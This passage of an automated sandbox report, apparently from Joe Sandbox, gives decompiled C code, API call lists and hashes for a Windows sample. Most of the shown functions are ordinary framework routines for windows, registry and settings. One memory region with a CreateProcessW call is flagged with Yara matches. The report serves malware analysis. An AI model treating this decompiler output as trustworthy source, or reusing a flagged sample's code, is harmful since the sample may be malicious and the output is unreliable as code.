                  				_v276 = _t157;
                  				_v272 = _a8;
                  				_t167 = __ecx;
                  				if(__ecx == 0) {
                  					L2:
                  					E00406436(_t128, _t130, _t153, _t157, _t167);
                  				}
                  				if(_t157 == _t153) {
                  					goto L2;
                  				}
                  				_t76 = GetWindowRect( *(_t157 + 0x20),  &_v316);
                  				if( *((intOrPtr*)(_t157 + 0x90)) != _t128 || _v272 != _t153 && EqualRect( &_v316, _v272) == 0) {
                  					if( *((intOrPtr*)(_t128 + 0x98)) != _t153 && ( *(_t157 + 0x88) & 0x00000040) != 0) {
                  						 *(_t128 + 0x84) =  *(_t128 + 0x84) | 0x00000040;
                  					}
                  					 *(_t128 + 0x84) =  *(_t128 + 0x84) & 0xfffffff9;
                  					_t79 =  *(_t157 + 0x84) & 0x00000006 |  *(_t128 + 0x84);
                  					 *(_t128 + 0x84) = _t79;
                  					_t175 = _t79 & 0x00000040;
                  					if((_t79 & 0x00000040) == 0) {
                  						_push(0x104);
                  						_push( &_v268);
                  						E00412D87(_t128, _t157, _t151, _t153, _t157, _t175); // executed
                  						E0041FC5A(_t157, _t151,  *((intOrPtr*)(_t128 + 0x20)),  &_v268); // executed
                  					}
                  					_t84 = ( *(_t157 + 0x84) ^  *(_t128 + 0x84)) & 0x0000f000 ^  *(_t157 + 0x84) | 0x00000f00;
                  					if( *((intOrPtr*)(_t128 + 0x98)) == _t153) {
                  						_t85 = _t84 & 0xfffffffe;
                  						__eflags = _t84 & 0xfffffffe;
                  					} else {
                  						_t85 = _t84 | 0x00000001;
                  					}
                  					E00420D66(_t157, _t85);
                  					_v296 = _t153;
                  					if( *((intOrPtr*)(_t157 + 0x90)) != _t128 && IsWindowVisible( *(_t157 + 0x20)) != 0) {
                  						E00412D05(_t157, _t153, _t153, _t153, _t153, _t153, 0x97);
                  						_v296 = 1;
                  					}
                  					_v300 = _v300 | 0xffffffff;
                  					if(_v272 == _t153) {
                  						E004133A2(_t128 + 0x9c, _t157);
                  						E004133A2(_t128 + 0x9c, _t153);
                  						_t89 =  *0x466524; // 0x2
                  						_t91 =  *0x466520; // 0x2
                  						_t135 = _t157;
                  						E00412D05(_t157, _t153,  ~_t91,  ~_t89, _t153, _t153, 0x115);
                  					} else {
                  						E00413342( &_v292, _v272);
                  						E00422BFB(_t128,  &_v292);
                  						asm("cdq");
                  						asm("cdq");
                  						_push((_v280 - _v288 - _t151 >> 1) + _v288);
                  						_push((_v284 - _v292 - _t151 >> 1) + _v292);
                  						_push(_v276);
                  						asm("movsd");
                  						asm("movsd");
                  						asm("movsd");
                  						asm("movsd");
                  						_t114 = E0041365C(_t128);
                  						_t135 = _v276;
                  						_v300 = _t114;
                  						E00412D05(_v276, 0, _v292, _v288, _v284 - _v292, _v280 - _v288, 0x114);
                  						_t157 = _v276;
                  						_t153 = 0;
                  					}
                  					if(E0040EE3C(_t128, _t135, GetParent( *(_t157 + 0x20))) != _t128) {
                  						E004133D6(_t157, _t128);
                  					}
                  					_t136 =  *((intOrPtr*)(_t157 + 0x90));
                  					if(_t136 != _t128) {
                  						__eflags = _t136 - _t153;
                  						if(_t136 != _t153) {
                  							__eflags =  *((intOrPtr*)(_t128 + 0x98)) - _t153;
                  							if( *((intOrPtr*)(_t128 + 0x98)) == _t153) {
                  								L29:
                  								_t99 = 0;
                  								__eflags = 0;
                  							} else {
                  								__eflags =  *((intOrPtr*)(_t136 + 0x98)) - _t153;
                  								if( *((intOrPtr*)(_t136 + 0x98)) != _t153) {
                  									goto L29;
                  								} else {
                  									_t99 = 1;
                  								}
                  							}
                  							_push(_t99);
                  							_push(0xffffffff);
                  							goto L31;
                  						}
                  					} else {
                  						_push(_t153);
                  						_push(_v300);
                  						L31:
                  						_push(_t157);
                  						E00413A2C(_t136, _t153);
                  					}
                  					 *((intOrPtr*)(_t157 + 0x90)) = _t128;
                  					if(_v296 != _t153) {
                  						E00412D05(_t157, _t153, _t153, _t153, _t153, _t153, 0x57);
                  					}
                  					E004139C3(_t128, _t128, _t157);
                  					 *(E00408487(_t128) + 0xe4) =  *(_t76 + 0xe4) | 0x0000000c;
                  				}
                  				_pop(_t154);
                  				_pop(_t158);
                  				_pop(_t129);
                  				return E00430650(_t76, _t129, _v8 ^ _t161, _t151, _t154, _t158);
                  			}

                  APIs
                  • GetWindowRect.USER32 ref: 004141AB
                  • EqualRect.USER32 ref: 004141D2
                  • IsWindowVisible.USER32(?), ref: 00414281
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                    • Part of subcall function 0041365C: GetWindowRect.USER32 ref: 004136C8
                    • Part of subcall function 00412D05: SetWindowPos.USER32(C033D88B,000000FF,?,?,00000000,0040E9F3,?,?,0040E9F3,00000000,?,?,000000FF,000000FF,00000015), ref: 00412D2D
                  • GetParent.USER32(?), ref: 004143A8
                    • Part of subcall function 004133D6: SetParent.USER32(?,?,?,004143C0,?,00000000), ref: 004133E9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$Rect$Parent$EqualException@8H_prolog3ThrowVisible
                  • String ID: @
                  • API String ID: 2897153062-2766056989
                  • Opcode ID: 51da40c84404c78246d96a9ebf4bc883016bb9fe2410d1c0c45aae66030a84c8
                  • Instruction ID: f72a821154006f18434582f8d291f052a883131ce462ce5628eead07db9ff8ab
                  • Opcode Fuzzy Hash: 51da40c84404c78246d96a9ebf4bc883016bb9fe2410d1c0c45aae66030a84c8
                  • Instruction Fuzzy Hash: B771B331A005189FCB25DF25DC82BEAB7B9BF89304F0041AEE959E6191DB745EC18F18
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 72%
                  			E00414CC5(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t17;
                  				intOrPtr* _t20;
                  				intOrPtr _t26;
                  				void* _t33;
                  				void* _t34;
                  
                  				_push(4);
                  				E00431A9B(E0044B279, __ebx, __edi, __esi);
                  				_t33 = __ecx;
                  				 *((intOrPtr*)(_t34 - 0x10)) = 0;
                  				E00414C61(__ecx, 0x20, _t34 - 0x10);
                  				if( *((intOrPtr*)(_t34 + 8)) != 0) {
                  					_t37 =  *((intOrPtr*)(_t34 - 0x10));
                  					if( *((intOrPtr*)(_t34 - 0x10)) == 0) {
                  						_t26 = E00404461(_t37, 0x20);
                  						 *((intOrPtr*)(_t34 - 0x10)) = _t26;
                  						 *(_t34 - 4) = 0;
                  						_t38 = _t26;
                  						if(_t26 == 0) {
                  							_t20 = 0;
                  							__eflags = 0;
                  						} else {
                  							_push(0x1e);
                  							_push( *((intOrPtr*)(_t34 + 8)));
                  							_push("File%d");
                  							_push("Recent File List");
                  							_push(0);
                  							_t20 = E00426DDD(__ebx, _t26, __edx, 0, _t33, _t38);
                  						}
                  						 *(_t34 - 4) =  *(_t34 - 4) | 0xffffffff;
                  						 *((intOrPtr*)(_t33 + 0x88)) = _t20;
                  						 *((intOrPtr*)( *_t20 + 0x10))();
                  					}
                  				}
                  				_t17 = E00426574(_t33, "Settings", "PreviewPages", 0); // executed
                  				 *((intOrPtr*)(_t33 + 0x94)) = _t17;
                  				return E00431B73(_t17);
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00414CCC
                    • Part of subcall function 00404461: _malloc.LIBCMT ref: 0040447F
                    • Part of subcall function 00426DDD: __EH_prolog3.LIBCMT ref: 00426DE4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$_malloc
                  • String ID: File%d$PreviewPages$Recent File List$Settings
                  • API String ID: 1683881009-526586445
                  • Opcode ID: defe5883bab1cd2dd2f943370091bc3ab319ea14d251a2d82829bc4171220619
                  • Instruction ID: 8481b4ebb2348d884e7cf6e9b90d4b3e2943030dba93614afa04e91a5076872d
                  • Opcode Fuzzy Hash: defe5883bab1cd2dd2f943370091bc3ab319ea14d251a2d82829bc4171220619
                  • Instruction Fuzzy Hash: 0901D430E40314ABCF16EFB19846BAF76A0ABC4B01F20451FF5159B2D2DBB84981974D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 76%
                  			E0041FC5A(void* __ecx, intOrPtr __edx, struct HWND__* _a4, CHAR* _a8) {
                  				signed int _v8;
                  				char _v263;
                  				char _v264;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t9;
                  				int _t16;
                  				struct HWND__* _t22;
                  				intOrPtr _t23;
                  				void* _t24;
                  				intOrPtr _t27;
                  				void* _t28;
                  				int _t29;
                  				intOrPtr _t30;
                  				CHAR* _t32;
                  				intOrPtr _t33;
                  				signed int _t37;
                  
                  				_t27 = __edx;
                  				_t24 = __ecx;
                  				_t35 = _t37;
                  				_t9 =  *0x463404; // 0x38a11573
                  				_v8 = _t9 ^ _t37;
                  				_t22 = _a4;
                  				_t32 = _a8;
                  				_push(_t28);
                  				_t41 = _t22;
                  				if(_t22 == 0) {
                  					L2:
                  					E00406436(_t22, _t24, _t28, _t32, _t41);
                  				}
                  				if(_t32 == 0) {
                  					goto L2;
                  				}
                  				_t29 = lstrlenA(_t32);
                  				_v264 = 0;
                  				E00431160(_t29,  &_v263, 0, 0xff);
                  				if(_t29 > 0x100 || GetWindowTextA(_t22,  &_v264, 0x100) != _t29) {
                  					L7:
                  					_t16 = SetWindowTextA(_t22, _t32);
                  				} else {
                  					_t16 = lstrcmpA( &_v264, _t32); // executed
                  					if(_t16 != 0) {
                  						goto L7;
                  					}
                  				}
                  				_pop(_t30);
                  				_pop(_t33);
                  				_pop(_t23);
                  				return E00430650(_t16, _t23, _v8 ^ _t35, _t27, _t30, _t33);
                  			}

                  APIs
                  • lstrlenA.KERNEL32(0040539B,?,00000204), ref: 0041FC86
                  • _memset.LIBCMT ref: 0041FCA3
                  • GetWindowTextA.USER32 ref: 0041FCBD
                  • lstrcmpA.KERNEL32(00000000,0040539B,?,00000204), ref: 0041FCCF
                  • SetWindowTextA.USER32(?,0040539B), ref: 0041FCDB
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
                  • String ID:
                  • API String ID: 4273134663-0
                  • Opcode ID: f9e786dce0f22551689d7a2192799aad719d627e5046027f7c7b4cb0d049690b
                  • Instruction ID: 524bb6e1b8b0e51b663d6798a7e8f58f098cd5426cf83612b6fa717cd64371da
                  • Opcode Fuzzy Hash: f9e786dce0f22551689d7a2192799aad719d627e5046027f7c7b4cb0d049690b
                  • Instruction Fuzzy Hash: EF01087660021867DB10AF659D84BDF776CFB59700F000076F906D3241EA74C9859BE8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 91%
                  			E00448692(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t50;
                  				void* _t54;
                  				intOrPtr _t57;
                  				intOrPtr* _t59;
                  				intOrPtr* _t63;
                  				void* _t76;
                  				void* _t77;
                  				intOrPtr* _t80;
                  				char* _t81;
                  				char _t84;
                  				intOrPtr* _t87;
                  				intOrPtr* _t118;
                  				intOrPtr* _t123;
                  				void* _t124;
                  				void* _t125;
                  
                  				_push(0x54);
                  				E00431B04(E0044CC2A, __ebx, __edi, __esi);
                  				_t84 =  *((intOrPtr*)(_t124 + 8));
                  				_t123 = __ecx;
                  				if(_t84 != 0xffffffff) {
                  					_t87 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x24))));
                  					_t118 = 0;
                  					__eflags = _t87;
                  					if(_t87 == 0) {
                  						L7:
                  						_t50 =  *((intOrPtr*)(_t123 + 0x4c));
                  						__eflags = _t50 - _t118;
                  						if(_t50 != _t118) {
                  							__eflags =  *((intOrPtr*)(_t123 + 0x3c)) - _t118;
                  							if(__eflags != 0) {
                  								 *((char*)(_t124 - 0x30)) = _t84;
                  								E00448494(_t84, _t124 - 0x2c, _t109, 8, _t118);
                  								 *((intOrPtr*)(_t124 - 4)) = _t118;
                  								_t54 = E0044794F(E0044818F(_t124 - 0x2c, _t124 - 0x48));
                  								_t57 = E0044794F(E0044818F(_t124 - 0x2c, _t124 - 0x50));
                  								_t118 =  *((intOrPtr*)(_t124 - 0x18)) + _t54;
                  								_push(_t124 - 0x38);
                  								_t84 = _t123 + 0x44;
                  								while(1) {
                  									_t113 = _t124 - 0x30;
                  									 *((intOrPtr*)(_t124 - 0x34)) = _t57;
                  									_t59 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x3c)))) + 0x14))(_t84, _t124 - 0x30, _t124 - 0x2f, _t124 - 0x3c, _t57, _t118);
                  									__eflags = _t59;
                  									if(_t59 < 0) {
                  										break;
                  									}
                  									__eflags = _t59 - 1;
                  									if(_t59 > 1) {
                  										__eflags = _t59 - 3;
                  										if(__eflags != 0) {
                  											goto L25;
                  										} else {
                  											_t63 = E00447F97(__eflags,  *((intOrPtr*)(_t124 - 0x30)),  *((intOrPtr*)(_t123 + 0x4c)));
                  											__eflags = _t63;
                  											if(_t63 != 0) {
                  												goto L27;
                  											} else {
                  												goto L25;
                  											}
                  										}
                  									} else {
                  										_t118 =  *((intOrPtr*)(_t124 - 0x38)) - E0044794F(E0044818F(_t124 - 0x2c, _t124 - 0x58));
                  										__eflags = _t118;
                  										if(_t118 == 0) {
                  											L16:
                  											_t67 = _t124 - 0x30;
                  											 *((char*)(_t123 + 0x41)) = 1;
                  											__eflags =  *((intOrPtr*)(_t124 - 0x3c)) - _t124 - 0x30;
                  											if( *((intOrPtr*)(_t124 - 0x3c)) != _t124 - 0x30) {
                  												L27:
                  												_t123 =  *((intOrPtr*)(_t124 + 8));
                  											} else {
                  												__eflags = _t118;
                  												if(_t118 > 0) {
                  													L20:
                  													 *((intOrPtr*)(_t124 - 0x40)) = E0044794F(E0044818F(_t124 - 0x2c, _t124 - 0x48));
                  													_t57 = E0044794F(E0044818F(_t124 - 0x2c, _t124 - 0x50));
                  													_push(_t124 - 0x38);
                  													_t118 =  *((intOrPtr*)(_t124 - 0x18)) +  *((intOrPtr*)(_t124 - 0x40));
                  													__eflags = _t118;
                  													continue;
                  												} else {
                  													__eflags =  *((intOrPtr*)(_t124 - 0x18)) - 0x20;
                  													if( *((intOrPtr*)(_t124 - 0x18)) >= 0x20) {
                  														goto L25;
                  													} else {
                  														E00448268(_t67, _t124 - 0x2c, _t113, _t123, 8, 0);
                  														goto L20;
                  													}
                  												}
                  											}
                  										} else {
                  											_t76 = E0044794F(E0044818F(_t124 - 0x2c, _t124 - 0x60));
                  											_push( *((intOrPtr*)(_t123 + 0x4c)));
                  											_push(_t118);
                  											_push(1);
                  											_push(_t76);
                  											_t77 = E00449E18(_t84, _t113, _t118, _t123, __eflags);
                  											_t125 = _t125 + 0x10;
                  											__eflags = _t118 - _t77;
                  											if(_t118 != _t77) {
                  												L25:
                  												__eflags = _t123;
                  											} else {
                  												goto L16;
                  											}
                  										}
                  									}
                  									E00402090(_t124 - 0x2c, _t124, 1, 0);
                  									goto L2;
                  								}
                  								goto L25;
                  							} else {
                  								_t50 = E00447F97(__eflags, _t84, _t50); // executed
                  								__eflags = _t50;
                  								if(_t50 == 0) {
                  									goto L8;
                  								} else {
                  									goto L6;
                  								}
                  							}
                  						} else {
                  							L8:
                  						}
                  					} else {
                  						_t80 =  *((intOrPtr*)(__ecx + 0x34));
                  						_t109 =  *_t80 + _t87;
                  						__eflags = _t87 -  *_t80 + _t87;
                  						if(_t87 >=  *_t80 + _t87) {
                  							goto L7;
                  						} else {
                  							 *_t80 =  *_t80 - 1;
                  							__eflags =  *_t80;
                  							_t123 =  *((intOrPtr*)(__ecx + 0x24));
                  							_t81 =  *_t123;
                  							 *_t123 = _t81 + 1;
                  							 *_t81 = _t84;
                  							L6:
                  						}
                  					}
                  				} else {
                  				}
                  				L2:
                  				return E00431B87(_t84, _t118, _t123);
                  			}

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Fputc$H_prolog3_
                  • String ID:
                  • API String ID: 2569218679-3916222277
                  • Opcode ID: 237c212654eced7c93fdea10f5d81e29309294a7abb01743d3939285b13505b4
                  • Instruction ID: 43a9223603d8fbf2c2dcb423a63fa1aa8cc96a8be0706671927d04f470b5847f
                  • Opcode Fuzzy Hash: 237c212654eced7c93fdea10f5d81e29309294a7abb01743d3939285b13505b4
                  • Instruction Fuzzy Hash: 9251F532D046049FEF14EBA5CC819EEB3B6AF48314F24451FE102A7281EF38A805CB58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 02311CF2
                  • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 02311D12
                  • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 02311D1B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandle$CreateProcess
                  • String ID: D
                  • API String ID: 2922976086-2746444292
                  • Opcode ID: b5c36caf711e3752c47cd49f31f1c9c67ed657577fb943b044154ee70cc707a3
                  • Instruction ID: 63fa81e7e5cd08aff09f596ed4f105b445deadc394d2815a49ec7bea7fb35380
                  • Opcode Fuzzy Hash: b5c36caf711e3752c47cd49f31f1c9c67ed657577fb943b044154ee70cc707a3
                  • Instruction Fuzzy Hash: F7F0C272900008ABDB29DEA5DC089FFB7BDEF45311F11442AEA1AE6100EBB19908C6A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 75%
                  			E00426700(void* __ecx, intOrPtr _a4, CHAR* _a8, char* _a12, long _a16) {
                  				int* _v8;
                  				char _v16;
                  				signed int _v20;
                  				char _v4116;
                  				char _v4120;
                  				intOrPtr _v4124;
                  				CHAR* _v4128;
                  				int _v4132;
                  				long _v4136;
                  				void* _v4140;
                  				int _v4144;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t45;
                  				signed int _t46;
                  				CHAR* _t48;
                  				intOrPtr _t52;
                  				void* _t54;
                  				long _t58;
                  				char* _t69;
                  				intOrPtr _t70;
                  				intOrPtr _t79;
                  				long _t85;
                  				intOrPtr _t87;
                  				intOrPtr _t88;
                  				void* _t89;
                  				intOrPtr _t92;
                  				signed int _t93;
                  
                  				_t71 = __ecx;
                  				_push(0xffffffff);
                  				_push(E0044C291);
                  				_push( *[fs:0x0]);
                  				E004348C0(0x1020);
                  				_t45 =  *0x463404; // 0x38a11573
                  				_t46 = _t45 ^ _t93;
                  				_v20 = _t46;
                  				_push(_t46);
                  				 *[fs:0x0] =  &_v16;
                  				_t87 = _a4;
                  				_t85 = _a16;
                  				_t48 = _a8;
                  				_t69 = _a12;
                  				_v4124 = _t87;
                  				_v4128 = _t85;
                  				_v4136 = 0;
                  				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
                  					__eflags = _t85;
                  					if(__eflags == 0) {
                  						_v4128 = 0x44f0f5;
                  					}
                  					GetPrivateProfileStringA(_t48, _t69, _v4128,  &_v4116, 0x1000,  *(_t71 + 0x68)); // executed
                  					_push( &_v4116);
                  					goto L12;
                  				} else {
                  					_t54 = E0042652C(__ecx, _t48);
                  					_v4140 = _t54;
                  					_t95 = _t54;
                  					if(_t54 != 0) {
                  						E004014C0( &_v4120, _t85);
                  						_t89 = RegQueryValueExA;
                  						_v8 = 0;
                  						_v4144 = 0;
                  						_v4132 = 0;
                  						_t58 = RegQueryValueExA(_v4140, _t69, 0,  &_v4144, 0,  &_v4132);
                  						_v4136 = _t58;
                  						__eflags = _t58;
                  						if(_t58 == 0) {
                  							_v4136 = RegQueryValueExA(_v4140, _t69, 0,  &_v4144, E004014F0( &_v4120, _v4132),  &_v4132);
                  							E0040A356( &_v4120, 0xffffffff);
                  						}
                  						RegCloseKey(_v4140);
                  						_t79 = _v4124;
                  						__eflags = _v4136;
                  						if(__eflags != 0) {
                  							_push(_v4128);
                  							E00406039(_t69, _t79, _t85, _t89, 0, __eflags);
                  						} else {
                  							E00405562(_t79, __eflags,  &_v4120);
                  						}
                  						E004010B0(_v4120 + 0xfffffff0, _t85);
                  						_t52 = _v4124;
                  					} else {
                  						_push(_v4128);
                  						L12:
                  						E00406039(_t69, _t87, _t85, _t87, 0, _t95);
                  						_t52 = _t87;
                  					}
                  				}
                  				 *[fs:0x0] = _v16;
                  				_pop(_t88);
                  				_pop(_t92);
                  				_pop(_t70);
                  				return E00430650(_t52, _t70, _v20 ^ _t93, _t85, _t88, _t92);
                  			}

                  APIs
                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,38A11573,?,?,?,?,0044C291,000000FF), ref: 004267AF
                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,?,?,0044C291,000000FF), ref: 004267E3
                  • RegCloseKey.ADVAPI32(?,?,?,?,?,0044C291,000000FF), ref: 004267FE
                  • GetPrivateProfileStringA.KERNEL32(?,?,?,?,00001000,?), ref: 00426866
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: QueryValue$ClosePrivateProfileString
                  • String ID:
                  • API String ID: 1042844925-0
                  • Opcode ID: 44fdfa9ff4de0f88582ee937e59d4afd3fbe754f203e2044626775c54224bd21
                  • Instruction ID: d787f72a76d7a1e81abdc91ab3fdba828746559dca16c0f286bccc120076d8c8
                  • Opcode Fuzzy Hash: 44fdfa9ff4de0f88582ee937e59d4afd3fbe754f203e2044626775c54224bd21
                  • Instruction Fuzzy Hash: C2416A75D001A8ABDB31DF55DC449EEB7B8EB48354F0041EAF189A2290C7B89EC5DF68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 77%
                  			E0040F918(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				struct HWND__* _t16;
                  				struct HWND__* _t18;
                  				struct HWND__* _t20;
                  				void* _t22;
                  				void* _t23;
                  				void* _t24;
                  				struct HWND__* _t25;
                  
                  				_t23 = __ecx;
                  				_t22 = __ebx;
                  				_t24 = GetTopWindow;
                  				_t16 = GetTopWindow(_a4);
                  				while(1) {
                  					_t25 = _t16;
                  					if(_t25 == 0) {
                  						break;
                  					}
                  					__eflags = _a24;
                  					if(__eflags == 0) {
                  						SendMessageA(_t25, _a8, _a12, _a16);
                  					} else {
                  						_t20 = E0040EE68(_t23, _t24, _t25, __eflags, _t25);
                  						__eflags = _t20;
                  						if(__eflags != 0) {
                  							_push(_a16);
                  							_push(_a12);
                  							_push(_a8);
                  							_push( *((intOrPtr*)(_t20 + 0x20)));
                  							_push(_t20); // executed
                  							E0040F62D(_t22, _t24, _t25, __eflags); // executed
                  						}
                  					}
                  					__eflags = _a20;
                  					if(_a20 != 0) {
                  						_t18 = GetTopWindow(_t25);
                  						__eflags = _t18;
                  						if(_t18 != 0) {
                  							E0040F918(_t22, _t23, _t25, _a8, _a12, _a16, _a20, _a24); // executed
                  						}
                  					}
                  					_t16 = GetWindow(_t25, 2);
                  				}
                  				return _t16;
                  			}

                  APIs
                  • GetTopWindow.USER32(?), ref: 0040F928
                  • GetTopWindow.USER32(00000000), ref: 0040F967
                  • GetWindow.USER32(00000000,00000002), ref: 0040F985
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window
                  • String ID:
                  • API String ID: 2353593579-0
                  • Opcode ID: 634e316a57366a6b5d692cc382059a7dd18669e77a7b49c22c6d5c96a702ac6b
                  • Instruction ID: b27234d353631adc336677cf3729c0b56e1793a16e94a8337e953a23c5fb5991
                  • Opcode Fuzzy Hash: 634e316a57366a6b5d692cc382059a7dd18669e77a7b49c22c6d5c96a702ac6b
                  • Instruction Fuzzy Hash: 2F01D77600151ABBCF226F969C04F9F3A26BF49351F454436FA10615A0C73ACA26EFA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 62%
                  			E00427206(void* __esi, void* _a4, CHAR* _a8, char* _a12) {
                  				void* __ebp;
                  				long _t13;
                  				long _t14;
                  				long _t17;
                  				long _t18;
                  				signed int _t20;
                  				void* _t23;
                  				void* _t24;
                  				void* _t25;
                  				long _t28;
                  
                  				_t29 = _a12;
                  				if(_a12 != 0) {
                  					_push(__esi);
                  					_push( &_a4);
                  					_push(_a4);
                  					_push(0x80000000); // executed
                  					_t13 = E0041FF90(_t23, _t24, _t25, __esi, __eflags); // executed
                  					__eflags = _t13;
                  					if(_t13 != 0) {
                  						L6:
                  						_t14 = 0;
                  						__eflags = 0;
                  						L7:
                  						return _t14;
                  					}
                  					_t17 = RegSetValueExA(_a4, _a12, 0, 1, _a8, lstrlenA(_a8) + 1); // executed
                  					_t28 = _t17;
                  					_t18 = RegCloseKey(_a4);
                  					__eflags = _t18;
                  					if(_t18 != 0) {
                  						goto L6;
                  					}
                  					__eflags = _t28;
                  					if(_t28 != 0) {
                  						goto L6;
                  					}
                  					_t14 = _t18 + 1;
                  					goto L7;
                  				}
                  				_push(lstrlenA(_a8));
                  				_push(_a8);
                  				_push(1);
                  				_push(_a4);
                  				_push(0x80000000); // executed
                  				_t20 = E004200A3(_t23, _t24, _t25, __esi, _t29); // executed
                  				asm("sbb eax, eax");
                  				return  ~_t20 + 1;
                  			}














                  APIs
                  • lstrlenA.KERNEL32(?), ref: 00427214
                    • Part of subcall function 004200A3: __EH_prolog3.LIBCMT ref: 004200AA
                    • Part of subcall function 004200A3: RegSetValueA.ADVAPI32(80000000,?,00000000,?,?), ref: 00420114
                  • lstrlenA.KERNEL32(?,80000000,?,?), ref: 0042724D
                  • RegSetValueExA.KERNELBASE(?,00000000,00000000,00000001,?,00000001), ref: 00427262
                  • RegCloseKey.ADVAPI32(?), ref: 0042726D
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
